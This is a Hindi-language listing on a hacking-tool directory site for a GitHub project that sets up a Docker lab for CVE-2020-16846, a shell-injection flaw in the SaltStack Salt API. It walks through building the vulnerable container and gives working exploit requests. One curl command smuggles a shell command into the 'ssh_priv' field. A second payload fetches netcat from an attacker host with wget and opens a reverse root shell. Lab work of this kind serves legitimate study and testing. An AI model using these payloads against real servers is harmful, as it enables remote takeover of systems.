Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-16846-Saltstack-Salt-API — CVE-2020-16846 का शोषण करने के लिए Docker-आधारित प्रयोगशाला वातावरण, जो SaltStack Salt API में एक शेल इंजेक्शन कमजोरी है, जिसमें चरण-दर-चरण शोषण निर्देश और रिवर्स शेल पेलोड उदाहरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/zomy22/cve-2020-16846-saltstack-salt-api
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubzomy22/cve-2020-16846-saltstack-salt-api

CVE-2020-16846-Saltstack-Salt-API

CVE-2020-16846 का शोषण करने के लिए Docker-आधारित प्रयोगशाला वातावरण, जो SaltStack Salt API में एक शेल इंजेक्शन कमजोरी है, जिसमें चरण-दर-चरण शोषण निर्देश और रिवर्स शेल पेलोड उदाहरण शामिल हैं।

रिपॉजिटरी देखें
324 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-16846-Saltstack-Salt-API

भेद्यता की व्याख्या: SaltStack Salt के 3002 तक के संस्करणों में एक समस्या पाई गई। Salt API पर क्राफ्टेड वेब अनुरोध भेजने, SSH क्लाइंट सक्षम होने पर, शेल इंजेक्शन का कारण बन सकता है। इस भेद्यता के बारे में विवरण यहाँ पाया जा सकता है:

https://www.zerodayinitiative.com/blog/2020/11/24/detailing-saltstack-salt-command-injection-vulnerabilities

अभ्यास और सीखने के उद्देश्यों के लिए, मैंने एक भेद्य उदाहरण बनाने और उसका शोषण करने का निर्णय लिया।

भेद्य संस्करण: https://github.com/saltstack/salt/releases/tag/v3002

Ubuntu 20.04.03 पर परीक्षण किया गया।

निर्देश

Docker में एक भेद्य उदाहरण बनाने के लिए Dockerfile का उपयोग करें।

यदि आप Ubuntu VM पर एक भेद्य उदाहरण बनाना चाहते हैं तो salt_setup.sh चलाएँ।

इमेज बनाएं

docker build -t salt-image .

कंटेनर चलाएँ और पोर्ट खोलें (शोषण करने के लिए केवल 8080 वास्तव में आवश्यक है)

docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest

api

शोषण

curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'

reverse_shell

रिवर्स शेल

root@kitploit:~
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f  #"}'

pwned

टूल डाउनलोड करें